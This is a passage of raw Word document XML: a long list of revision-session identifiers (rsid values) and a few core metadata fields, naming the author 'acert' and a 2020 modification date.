    <w:rsid w:val="2F2818BC"/>
    <w:rsid w:val="2F406BF2"/>
    <w:rsid w:val="2F5B2CC0"/>
    <w:rsid w:val="301648C9"/>
    <w:rsid w:val="3032219E"/>
    <w:rsid w:val="30354A74"/>
    <w:rsid w:val="317B4F83"/>
    <w:rsid w:val="320C1572"/>
    <w:rsid w:val="3235069F"/>
    <w:rsid w:val="328F1B78"/>
    <w:rsid w:val="329F47AE"/>
    <w:rsid w:val="32E87F0C"/>
    <w:rsid w:val="34943E48"/>
    <w:rsid w:val="34B24F23"/>
    <w:rsid w:val="34D93B94"/>
    <w:rsid w:val="34E17148"/>
    <w:rsid w:val="350461F4"/>
    <w:rsid w:val="350A2B11"/>
    <w:rsid w:val="35AB501A"/>
    <w:rsid w:val="36756317"/>
    <w:rsid w:val="368346B6"/>
    <w:rsid w:val="36F359F0"/>
    <w:rsid w:val="37BF0C95"/>
    <w:rsid w:val="37DB2FF8"/>
    <w:rsid w:val="38146223"/>
    <w:rsid w:val="385C6690"/>
    <w:rsid w:val="38617337"/>
    <w:rsid w:val="3A335D41"/>
    <w:rsid w:val="3A445192"/>
    <w:rsid w:val="3A9048D1"/>
    <w:rsid w:val="3B7F5B27"/>
    <w:rsid w:val="3BE03403"/>
    <w:rsid w:val="3BE071AF"/>
    <w:rsid w:val="3C811E8E"/>
    <w:rsid w:val="3CEA3B2F"/>
    <w:rsid w:val="3DCA7036"/>
    <w:rsid w:val="3E97636B"/>
    <w:rsid w:val="3EA646D6"/>
    <w:rsid w:val="3EC45628"/>
    <w:rsid w:val="3F634809"/>
    <w:rsid w:val="3FBE33C4"/>
    <w:rsid w:val="3FD83E9C"/>
    <w:rsid w:val="40646F82"/>
    <w:rsid w:val="406E38E5"/>
    <w:rsid w:val="408D5EF6"/>
    <w:rsid w:val="40B111BC"/>
    <w:rsid w:val="40D309C4"/>
    <w:rsid w:val="40DF450B"/>
    <w:rsid w:val="410D5218"/>
    <w:rsid w:val="414C2FEB"/>
    <w:rsid w:val="41C2405A"/>
    <w:rsid w:val="42562AAC"/>
    <w:rsid w:val="42587EDB"/>
    <w:rsid w:val="43222D4B"/>
    <w:rsid w:val="43442406"/>
    <w:rsid w:val="436E021D"/>
    <w:rsid w:val="437C4765"/>
    <w:rsid w:val="43A21D5C"/>
    <w:rsid w:val="43BB017F"/>
    <w:rsid w:val="4440499D"/>
    <w:rsid w:val="447536DE"/>
    <w:rsid w:val="450826A7"/>
    <w:rsid w:val="453B0B8C"/>
    <w:rsid w:val="45AE4988"/>
    <w:rsid w:val="46476832"/>
    <w:rsid w:val="467C4976"/>
    <w:rsid w:val="47114158"/>
    <w:rsid w:val="475A5BD0"/>
    <w:rsid w:val="47966704"/>
    <w:rsid w:val="497D3101"/>
    <w:rsid w:val="49B1237B"/>
    <w:rsid w:val="49DC58E6"/>
    <w:rsid w:val="4A2E3880"/>
    <w:rsid w:val="4A6873BC"/>
    <w:rsid w:val="4AA02D57"/>
    <w:rsid w:val="4AC722A0"/>
    <w:rsid w:val="4B742969"/>
    <w:rsid w:val="4C5D583B"/>
    <w:rsid w:val="4C6C133B"/>
    <w:rsid w:val="4D0A146A"/>
    <w:rsid w:val="4D543E28"/>
    <w:rsid w:val="4D766492"/>
    <w:rsid w:val="4DEE378A"/>
    <w:rsid w:val="4E4418DA"/>
    <w:rsid w:val="4E6C50C8"/>
    <w:rsid w:val="4E80383F"/>
    <w:rsid w:val="4E8D741F"/>
    <w:rsid w:val="50402219"/>
    <w:rsid w:val="50565944"/>
    <w:rsid w:val="50942AAE"/>
    <w:rsid w:val="509D70B9"/>
    <w:rsid w:val="50A7167F"/>
    <w:rsid w:val="50B419EB"/>
    <w:rsid w:val="512E2907"/>
    <w:rsid w:val="5141466F"/>
    <w:rsid w:val="51605FAB"/>
    <w:rsid w:val="516B5CBB"/>
    <w:rsid w:val="51FE04B2"/>
    <w:rsid w:val="520356A6"/>
    <w:rsid w:val="52054E02"/>
    <w:rsid w:val="529345B3"/>
    <w:rsid w:val="52D8016B"/>
    <w:rsid w:val="53B604A5"/>
    <w:rsid w:val="54083CA7"/>
    <w:rsid w:val="54783E08"/>
    <w:rsid w:val="55791B8C"/>
    <w:rsid w:val="558B57D0"/>
    <w:rsid w:val="55A63C71"/>
    <w:rsid w:val="55E66C4A"/>
    <w:rsid w:val="55F154B1"/>
    <w:rsid w:val="56834358"/>
    <w:rsid w:val="56C90F95"/>
    <w:rsid w:val="56D27BD4"/>
    <w:rsid w:val="57051499"/>
    <w:rsid w:val="57985313"/>
    <w:rsid w:val="584709AF"/>
    <w:rsid w:val="58CF1AA1"/>
    <w:rsid w:val="58D401AB"/>
    <w:rsid w:val="590651D7"/>
    <w:rsid w:val="590D4E99"/>
    <w:rsid w:val="591A3862"/>
    <w:rsid w:val="592D4568"/>
    <w:rsid w:val="59845247"/>
    <w:rsid w:val="59AB7741"/>
    <w:rsid w:val="59EF0DC5"/>
    <w:rsid w:val="59F1642C"/>
    <w:rsid w:val="5A282B02"/>
    <w:rsid w:val="5A404452"/>
    <w:rsid w:val="5A4B4A8E"/>
    <w:rsid w:val="5A695906"/>
    <w:rsid w:val="5A846C5F"/>
    <w:rsid w:val="5AB75370"/>
    <w:rsid w:val="5ABB663A"/>
    <w:rsid w:val="5AC91405"/>
    <w:rsid w:val="5ACD3160"/>
    <w:rsid w:val="5AD45BCF"/>
    <w:rsid w:val="5B403ACE"/>
    <w:rsid w:val="5B5F2BA1"/>
    <w:rsid w:val="5B6134ED"/>
    <w:rsid w:val="5BB23E4D"/>
    <w:rsid w:val="5C0E1C7C"/>
    <w:rsid w:val="5C9009D5"/>
    <w:rsid w:val="5CB23469"/>
    <w:rsid w:val="5CBF3E87"/>
    <w:rsid w:val="5CCB0A02"/>
    <w:rsid w:val="5CD26F9B"/>
    <w:rsid w:val="5D713BFE"/>
    <w:rsid w:val="5DCB7C61"/>
    <w:rsid w:val="5DDF4DE1"/>
    <w:rsid w:val="5DF71296"/>
    <w:rsid w:val="5E2678CF"/>
    <w:rsid w:val="5E334CD4"/>
    <w:rsid w:val="5E553817"/>
    <w:rsid w:val="5E7F7BE1"/>
    <w:rsid w:val="5ED55F8D"/>
    <w:rsid w:val="5EDF2422"/>
    <w:rsid w:val="5EE72E77"/>
    <w:rsid w:val="5EF41B6B"/>
    <w:rsid w:val="5FB02108"/>
    <w:rsid w:val="5FC07789"/>
    <w:rsid w:val="5FC54907"/>
    <w:rsid w:val="5FEC7B93"/>
    <w:rsid w:val="600036CA"/>
    <w:rsid w:val="607521C8"/>
    <w:rsid w:val="613378B1"/>
    <w:rsid w:val="61372D19"/>
    <w:rsid w:val="61B648BA"/>
    <w:rsid w:val="61F7135C"/>
    <w:rsid w:val="623617BE"/>
    <w:rsid w:val="62770342"/>
    <w:rsid w:val="62845A1F"/>
    <w:rsid w:val="62BA1272"/>
    <w:rsid w:val="62C83FBC"/>
    <w:rsid w:val="631A0761"/>
    <w:rsid w:val="63397CA9"/>
    <w:rsid w:val="63621CE5"/>
    <w:rsid w:val="63920F0B"/>
    <w:rsid w:val="63D04B03"/>
    <w:rsid w:val="64986C30"/>
    <w:rsid w:val="64E53F78"/>
    <w:rsid w:val="65126CD9"/>
    <w:rsid w:val="6554389B"/>
    <w:rsid w:val="656F70ED"/>
    <w:rsid w:val="6578093F"/>
    <w:rsid w:val="65997875"/>
    <w:rsid w:val="65D459C7"/>
    <w:rsid w:val="6626794A"/>
    <w:rsid w:val="66592C41"/>
    <w:rsid w:val="66B44FE0"/>
    <w:rsid w:val="671C465B"/>
    <w:rsid w:val="67365ECB"/>
    <w:rsid w:val="67EA2844"/>
    <w:rsid w:val="67FC34BD"/>
    <w:rsid w:val="68055C21"/>
    <w:rsid w:val="6822442B"/>
    <w:rsid w:val="687B3C48"/>
    <w:rsid w:val="689B458D"/>
    <w:rsid w:val="68E37F56"/>
    <w:rsid w:val="69566160"/>
    <w:rsid w:val="6A053187"/>
    <w:rsid w:val="6A08576D"/>
    <w:rsid w:val="6A097786"/>
    <w:rsid w:val="6A4F4BB1"/>
    <w:rsid w:val="6B696F52"/>
    <w:rsid w:val="6BA878CA"/>
    <w:rsid w:val="6BD214B8"/>
    <w:rsid w:val="6CAB3323"/>
    <w:rsid w:val="6CFE6E08"/>
    <w:rsid w:val="6D213DD1"/>
    <w:rsid w:val="6D9C1CCD"/>
    <w:rsid w:val="6DB22FB6"/>
    <w:rsid w:val="6E015C8B"/>
    <w:rsid w:val="6EAB213D"/>
    <w:rsid w:val="6EE221FA"/>
    <w:rsid w:val="6F0C1CEE"/>
    <w:rsid w:val="6F21127B"/>
    <w:rsid w:val="6F2B63E7"/>
    <w:rsid w:val="6F621741"/>
    <w:rsid w:val="70205E1E"/>
    <w:rsid w:val="705E7FAE"/>
    <w:rsid w:val="70DD25A2"/>
    <w:rsid w:val="70E722AE"/>
    <w:rsid w:val="70F90BE4"/>
    <w:rsid w:val="719B0AF8"/>
    <w:rsid w:val="72182509"/>
    <w:rsid w:val="72333BDE"/>
    <w:rsid w:val="72757967"/>
    <w:rsid w:val="72AB25A2"/>
    <w:rsid w:val="72B92075"/>
    <w:rsid w:val="735658BD"/>
    <w:rsid w:val="739A51DF"/>
    <w:rsid w:val="742C56DE"/>
    <w:rsid w:val="748B649A"/>
    <w:rsid w:val="74C85A0C"/>
    <w:rsid w:val="74E85F6D"/>
    <w:rsid w:val="750F00C2"/>
    <w:rsid w:val="751F56A1"/>
    <w:rsid w:val="752720E9"/>
    <w:rsid w:val="754A331C"/>
    <w:rsid w:val="75807258"/>
    <w:rsid w:val="760D1CB3"/>
    <w:rsid w:val="76101C42"/>
    <w:rsid w:val="763579D1"/>
    <w:rsid w:val="76F612E9"/>
    <w:rsid w:val="77007899"/>
    <w:rsid w:val="776F02F9"/>
    <w:rsid w:val="77750ED9"/>
    <w:rsid w:val="77996A33"/>
    <w:rsid w:val="782B08BE"/>
    <w:rsid w:val="783D44A1"/>
    <w:rsid w:val="78730045"/>
    <w:rsid w:val="79642BD4"/>
    <w:rsid w:val="79AF79B8"/>
    <w:rsid w:val="7A620396"/>
    <w:rsid w:val="7A7D1888"/>
    <w:rsid w:val="7A992503"/>
    <w:rsid w:val="7ACA584F"/>
    <w:rsid w:val="7AE911F5"/>
    <w:rsid w:val="7B402629"/>
    <w:rsid w:val="7BD23378"/>
    <w:rsid w:val="7BEB72AA"/>
    <w:rsid w:val="7C316CAA"/>
    <w:rsid w:val="7C726704"/>
    <w:rsid w:val="7CEA0ED4"/>
    <w:rsid w:val="7D780374"/>
    <w:rsid w:val="7DBC49E2"/>
    <w:rsid w:val="7EAB58A4"/>
    <w:rsid w:val="7EC320C3"/>
    <w:rsid w:val="7F017D2C"/>
    <w:rsid w:val="7F0371B0"/>
    <w:rsid w:val="7F0A407A"/>
    <w:rsid w:val="7F857A1E"/>
    <w:rsid w:val="7FA5438C"/>
    <w:rsid w:val="7FAB37FF"/>
    <w:rsid w:val="7FCD6F0B"/>
    <w:rsid w:val="7FF13B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acert</dc:creator>
  <cp:lastModifiedBy>acert</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-28T07:22:57Z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